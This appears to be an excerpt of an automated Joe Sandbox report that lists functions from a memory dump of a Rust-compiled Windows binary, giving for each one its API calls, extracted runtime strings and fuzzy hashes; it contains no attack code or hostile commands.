String ID: .debug_abbrev.debug_addr.debug_aranges.debug_cu_index.debug_info.debug_line.debug_line_str.debug_loc.debug_loclists.debug_ranges.debug_rnglists.debug_str.debug_str_offsets.debug_tu_index.debug_typesNulErrorUtf8Errorvalid_up_toerror_len$.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwostd\src\..\..\backtrace\src\symbolize\gimli.rs
API String ID: 3510742995-1621003032
Opcode ID: 465c0c65468802312c141db401ffbef177e1cebf0727745518d51c0557809070
Instruction ID: b6b35a65548167fda90fdac518ba089528d4153e4bf45f971f0e367ba13762a3
Opcode Fuzzy Hash: 465c0c65468802312c141db401ffbef177e1cebf0727745518d51c0557809070
Instruction Fuzzy Hash: 6C634F22A05FC588FB71AF25D8447F973A0FB44798F904227CA8D4BB99DF389299C350

Function 00007FF71A8460F0 Relevance: 39.2, APIs: 19, Strings: 3, Instructions: 738processCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF71A8461F8
GetCurrentDirectoryW.KERNEL32 ref: 00007FF71A846203
GetLastError.KERNEL32 ref: 00007FF71A84620F
GetLastError.KERNEL32 ref: 00007FF71A846228
GetLastError.KERNEL32 ref: 00007FF71A8462D2
memset.MSVCRT ref: 00007FF71A846416
RtlCaptureContext.KERNEL32 ref: 00007FF71A84641E
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF71A846442
CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF71A8465F0
memset.MSVCRT ref: 00007FF71A84660D

Strings

note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 00007FF71A846BC6
internal error: entered unreachable codemid > len, xrefs: 00007FF71A846C10
stack backtrace:, xrefs: 00007FF71A846388

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: ErrorLast$memset$CaptureContextCreateCurrentDirectoryEntryFunctionLookupSnapshotToolhelp32
String ID: internal error: entered unreachable codemid > len$note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
API String ID: 3426570729-3115839456
Opcode ID: 700dbfeda4b2ac3080319a059293a7588f7470218d2d891fa21f6de7dd7a7558
Instruction ID: bf3d798719c5143b09c29adc2b1de06a788d30d2bfa9b0cc246d8481513ebbf5
Opcode Fuzzy Hash: 700dbfeda4b2ac3080319a059293a7588f7470218d2d891fa21f6de7dd7a7558
Instruction Fuzzy Hash: A8825D32A09FC188FB71AF25D8443E9A7A0FB457A8F844176DA4D0BB95DF38D298C351

Function 00007FF71A821B50 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 373synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF71A821B8B
WaitForSingleObject.KERNEL32 ref: 00007FF71A821C7F
RtlNtStatusToDosError.NTDLL ref: 00007FF71A821D0C
CloseHandle.KERNEL32 ref: 00007FF71A821EE4

Part of subcall function 00007FF71A85A6D0: RtlCaptureContext.KERNEL32 ref: 00007FF71A85A755
Part of subcall function 00007FF71A85A6D0: RtlUnwindEx.KERNEL32 ref: 00007FF71A85A773
Part of subcall function 00007FF71A85A6D0: abort.MSVCRT ref: 00007FF71A85A779
Part of subcall function 00007FF71A85A6D0: abort.MSVCRT ref: 00007FF71A85A790

MultiByteToWideChar.KERNEL32 ref: 00007FF71A821F94
WriteConsoleW.KERNEL32 ref: 00007FF71A821FD3
WriteConsoleW.KERNEL32 ref: 00007FF71A82203A
GetLastError.KERNEL32 ref: 00007FF71A822043
GetLastError.KERNEL32 ref: 00007FF71A8220AE

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF71A821E82

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: Error$Last$ConsoleWriteabort$ByteCaptureCharCloseContextHandleMultiObjectSingleStatusUnwindWaitWide
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 2746922508-2333694755
Opcode ID: 1943f669cd461ed7cfe3f0caab3c986ac50bc5a7770bbf290810a4577c30efa1
Instruction ID: bbca03b8aa5020b86e79d6a0ac4f1eb8c32b22517468fdca985d59b64da2e81a
Opcode Fuzzy Hash: 1943f669cd461ed7cfe3f0caab3c986ac50bc5a7770bbf290810a4577c30efa1
Instruction Fuzzy Hash: C5F1D565E08B9255FB12AB60D8403F9A761EB447A4F944273DE4D07AC9EF3CE5ADC320

Function 00007FF71A80381E Relevance: 17.1, APIs: 8, Strings: 3, Instructions: 614COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A804B06
memcpy.MSVCRT ref: 00007FF71A80506B
memcpy.MSVCRT ref: 00007FF71A805331

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF71A8062C1
assertion failed: self.can_inc_num_recv_streams(), xrefs: 00007FF71A8062EC
assertion failed: !stream.is_counted, xrefs: 00007FF71A806304

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: !stream.is_counted$assertion failed: self.can_inc_num_recv_streams()$called `Result::unwrap()` on an `Err` value
API String ID: 3510742995-2512240639
Opcode ID: bb9b4cdea68c3c6c5502eeef38eb9c56a70cb39bf36ed3e7c2f9ee69dbe14ae8
Instruction ID: 57d6ff72017813b7cfa37e73b2605ffda07cb6d14e3ef007cd4bdf461085fd69
Opcode Fuzzy Hash: bb9b4cdea68c3c6c5502eeef38eb9c56a70cb39bf36ed3e7c2f9ee69dbe14ae8
Instruction Fuzzy Hash: 7B725976A0CAC18AE771AB14E0403EAF7A0FB89754F844066DAC903B59DF3DE659CF50

Function 00007FF71A823D50 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 340windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF71A823D8D
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF71A823A3C), ref: 00007FF71A823DEC

Strings

NTDLL.DLL, xrefs: 00007FF71A823D9F

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: FormatMessagememset
String ID: NTDLL.DLL
API String ID: 3726309721-1613819793
Opcode ID: eab33b93f710d010e714ec6f04dbc267099dab0d677ccf8e740f568767f6d4bd
Instruction ID: 812cf504a414662c98e8821e2904a15715312c5d8dc2b506b1a2fcdbd6e4678d
Opcode Fuzzy Hash: eab33b93f710d010e714ec6f04dbc267099dab0d677ccf8e740f568767f6d4bd
Instruction Fuzzy Hash: 6BE1B736609EC389F7329F2598047FDA6A1FB147A8F844177CA4D06BCACF789259D360

Function 00007FF71A7A16A5 Relevance: 9.0, Strings: 7, Instructions: 280COMMON

Download Yara Rule

Strings

UUUUUUUU, xrefs: 00007FF71A7A184E
UUUUUUUU, xrefs: 00007FF71A7A1748
TUUUUUUU, xrefs: 00007FF71A7A1968
33333333, xrefs: 00007FF71A7A172D
33333333, xrefs: 00007FF71A7A1830
UUUUUUUU, xrefs: 00007FF71A7A1958
33333333, xrefs: 00007FF71A7A193D

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID: 33333333$33333333$33333333$TUUUUUUU$UUUUUUUU$UUUUUUUU$UUUUUUUU
API String ID: 0-2965141230
Opcode ID: f60313ba9b9ab27c5cf7d4157401e696c36093c9a3e5ca48406e424ac9b852ae
Instruction ID: 125652812ce13c8294af570f2b8b1913d39a060cc9731a1ee06570584131660a
Opcode Fuzzy Hash: f60313ba9b9ab27c5cf7d4157401e696c36093c9a3e5ca48406e424ac9b852ae
Instruction Fuzzy Hash: 8A91F592B24B9442FD04DB1254263BA9B51FB88FF0B49D536DE5E17B89DD3CD10AC301

Function 00007FF71A85B316 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00007FF71A85B3CA

Strings

CCG , xrefs: 00007FF71A85B336

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 8ac57d90e42a4040e0776beffc95396a19b90a09367fec87e1717899c4fa4228
Instruction ID: 2a9a49c814b06790da5edc0920132cfa28f6bb02e91f0bbcf09526ad68d8c267
Opcode Fuzzy Hash: 8ac57d90e42a4040e0776beffc95396a19b90a09367fec87e1717899c4fa4228
Instruction Fuzzy Hash: 5921D560E08D0241FF76366984593B891E1EF65334FD446B3DD2D923D0ED1CE8A94B21

Function 00007FF71A7A580B Relevance: 6.6, APIs: 5, Instructions: 395COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A7A5D4E
memset.MSVCRT ref: 00007FF71A7A5D97
memcpy.MSVCRT ref: 00007FF71A7A603D
memcpy.MSVCRT ref: 00007FF71A7A6058
memcpy.MSVCRT ref: 00007FF71A7A61AD
memcpy.MSVCRT ref: 00007FF71A7A6230

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: 7ef0bf32e0dff958b79f3f03d2aaa8bd88d078c67ff27315aee72a194ae9b298
Instruction ID: 873ee0f9ff95a6e7cd957e134e9075ed0cac1c92a02650edbbd98c7d2a7fa2a5
Opcode Fuzzy Hash: 7ef0bf32e0dff958b79f3f03d2aaa8bd88d078c67ff27315aee72a194ae9b298
Instruction Fuzzy Hash: 7C028766D19FC591F712AB3590432EAE310EFDA790F40D322DEC876A56DF68E24A8710

Function 00007FF71A8520B7 Relevance: 6.0, Strings: 3, Instructions: 2217COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF71A852BF0
xn--, xrefs: 00007FF71A852A62, 00007FF71A853DFD, 00007FF71A8540DD
a non-empty list of numbers, xrefs: 00007FF71A85481E

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID: H$a non-empty list of numbers$xn--
API String ID: 0-1214865122
Opcode ID: 02a82ffb36a74138aaf799468da970503353c98edbf0005a8b79749736b52315
Instruction ID: d814979096409333163eb7123e983a3f1d9510d0f73d9816a8bde02aad457f34
Opcode Fuzzy Hash: 02a82ffb36a74138aaf799468da970503353c98edbf0005a8b79749736b52315
Instruction Fuzzy Hash: E623C372A0CA8281FF66AA15E0543BEE3A1EB847A0F944077DE8D07695DF3CE59DC710

Function 00007FF71A7C9690 Relevance: 5.1, Strings: 4, Instructions: 124COMMON

Download Yara Rule

Strings

modnarod, xrefs: 00007FF71A7C96BA
uespemos, xrefs: 00007FF71A7C96AD
arenegyl, xrefs: 00007FF71A7C96C7
setybdet, xrefs: 00007FF71A7C96D4

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID: arenegyl$modnarod$setybdet$uespemos
API String ID: 0-66988881
Opcode ID: 113a1e3b4355a652b889cbf09a56c72cddd3ecfdee0c50286b3d641f9a01b346
Instruction ID: f0bd18902d32d4c2e3762e6b017d1db1fdf445eb13c7f0c6b2da6c56c2d56590
Opcode Fuzzy Hash: 113a1e3b4355a652b889cbf09a56c72cddd3ecfdee0c50286b3d641f9a01b346
Instruction Fuzzy Hash: E341F8A2B04F4642FF649F15E65026AE362EB587E4F40E132CE9D47B19DE2CD399C300

Function 00007FF71A855A4F Relevance: 4.5, Strings: 3, Instructions: 770COMMON

Download Yara Rule

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF71A856721
localhost, xrefs: 00007FF71A85609C
file://, xrefs: 00007FF71A855B60, 00007FF71A855DB1

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcmp
String ID: called `Result::unwrap()` on an `Err` value$file://$localhost
API String ID: 1475443563-2437099029
Opcode ID: 7808e8c62cbcf72d1c16be5caacce0cf6690ad052dd36c005e186cc515d91941
Instruction ID: ead9ca9d7e32c9c718927fe29b06bc7a4da6a1b19f575a6abeee021d96637775
Opcode Fuzzy Hash: 7808e8c62cbcf72d1c16be5caacce0cf6690ad052dd36c005e186cc515d91941
Instruction Fuzzy Hash: 64729262A08B8182FB25EB16E4407AAB7A0FB49BD4F848076DF8D43B55DF3CE159C710

Function 00007FF71A83EBC0 Relevance: 4.5, APIs: 3, Instructions: 736COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7b26ae574ae0dd688155c3ad15413920a3b6c5a24eda3ad677afa00ed149288
Instruction ID: 3c100e03cd20dca7f7f25792c90ec5fd267cfe680bfb451989c14f708558e958
Opcode Fuzzy Hash: c7b26ae574ae0dd688155c3ad15413920a3b6c5a24eda3ad677afa00ed149288
Instruction Fuzzy Hash: 3362C452E04FC482EB119F29D6012E86760FB687E8F859721DFAD17792EB34E6E5C340

Function 00007FF71A841AC0 Relevance: 4.5, APIs: 3, Instructions: 710COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bf8e16c863e984847b13e24ed0c1c73718213160d3a657dcba5cfc1109192cb
Instruction ID: d2ac716f71e26180ffccd2d39d7d098eeb07ad5b3db93e54485f5bea74b6e1e9
Opcode Fuzzy Hash: 6bf8e16c863e984847b13e24ed0c1c73718213160d3a657dcba5cfc1109192cb
Instruction Fuzzy Hash: A552D2A2B04FD486FB119F6995006E86721F754BE8F819722DF6E573C1EB38E5A8C300

Function 00007FF71A83B270 Relevance: 4.4, APIs: 3, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c786c8909a7afe34d1758cbb5397fff59dd7d21022c6cae131f33ae17bd6d9d7
Instruction ID: 55abbed28f1c8d67fdba4bbd375f6f8607b4cb374f3a3c11fb60d2e338db6b9a
Opcode Fuzzy Hash: c786c8909a7afe34d1758cbb5397fff59dd7d21022c6cae131f33ae17bd6d9d7
Instruction Fuzzy Hash: DC52C372A14F8492EB11DF29D5446AC7364FB58BA8F819722DF5D133A1EF38E1A9C310

Function 00007FF71A839EC0 Relevance: 4.4, APIs: 3, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3b460c03ecd99d31383eea612a178cd6c3bb66e9106fbbdf10d6822f0407e29
Instruction ID: 0272e0262057e408096c2dc1c782598ab31c821e8776d56ee9e5ddddd647a060
Opcode Fuzzy Hash: d3b460c03ecd99d31383eea612a178cd6c3bb66e9106fbbdf10d6822f0407e29
Instruction Fuzzy Hash: FD42E262E08F8582EB019F2595046A9E360FB547F8F869722EE7D133C6DF39E1E48310

Function 00007FF71A7A73DB Relevance: 4.0, Strings: 3, Instructions: 209COMMON

Download Yara Rule

Strings

UUUUUUUU, xrefs: 00007FF71A7A7489
33333333, xrefs: 00007FF71A7A7568
33333333, xrefs: 00007FF71A7A74EB

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID: 33333333$33333333$UUUUUUUU
API String ID: 0-629463729
Opcode ID: 648a1ea14ee8cd183d6b186b4834e8407f10b7a1b28f2e7c49a748422eb1716b
Instruction ID: a80ea5676230df872763acc73679dc62e61588669902a091a55303d54eb5b8d0
Opcode Fuzzy Hash: 648a1ea14ee8cd183d6b186b4834e8407f10b7a1b28f2e7c49a748422eb1716b
Instruction Fuzzy Hash: 60714591B18A5192F640FF61A825BBA9260BB49BF0F8CD476DE0E17B42CD3DE90DC351

Function 00007FF71A819A10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 548COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF71A819C3D

Strings

punycode{-0, xrefs: 00007FF71A81A14E

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memset
String ID: punycode{-0
API String ID: 2221118986-3751456247
Opcode ID: 8bca08c41737216f894c87e8c98f310099977dcc46f58ce0ba09f688e7c96895
Instruction ID: 306760a8bb4a5ba68536096399873c584666d5a74454931ff24b6de3bd7ce57b
Opcode Fuzzy Hash: 8bca08c41737216f894c87e8c98f310099977dcc46f58ce0ba09f688e7c96895
Instruction Fuzzy Hash: C1222362F09B8589FB66AB15D8447F8F691BB45BB4F808272CE4D477C0DF3CA56A8310

Function 00007FF71A7A7DCC Relevance: 3.5, Strings: 2, Instructions: 962COMMON

Download Yara Rule

Strings

33333333, xrefs: 00007FF71A7A8881
UUUUUUUU, xrefs: 00007FF71A7A8822

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID: 33333333$UUUUUUUU
API String ID: 0-3483174168
Opcode ID: db011157a4d7bb87602ea6f015b265488d9466aca90d9509a36e3630fcafff32
Instruction ID: 810551011f4dcf23fe30ad9093df0fe948feb2e63262c778c0dc7d2762f92fb1
Opcode Fuzzy Hash: db011157a4d7bb87602ea6f015b265488d9466aca90d9509a36e3630fcafff32
Instruction Fuzzy Hash: EE6217637197D446EA60DFA678606ABEB61F759BC0F48A026DF8E97B06CD3CD605C300

Function 00007FF71A839780 Relevance: 2.9, APIs: 2, Instructions: 441COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7329ed9576967a0fc049e02124edb2b8e6a3bebc96742d4853f4c7f0a68c2494
Instruction ID: cc752b7e4d2b0b5cb0a8e188b1bf057b0b6667c266d8aaa9a0b7aecdb3af07d9
Opcode Fuzzy Hash: 7329ed9576967a0fc049e02124edb2b8e6a3bebc96742d4853f4c7f0a68c2494
Instruction Fuzzy Hash: CF02EF62E08E8482FB719F2598693F9B751FB44BE8F804632CE1D8B784DE78D199C310

Function 00007FF71A7CF72A Relevance: 2.8, APIs: 2, Instructions: 303COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A7CFA6A
memcpy.MSVCRT ref: 00007FF71A7CFAD5

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

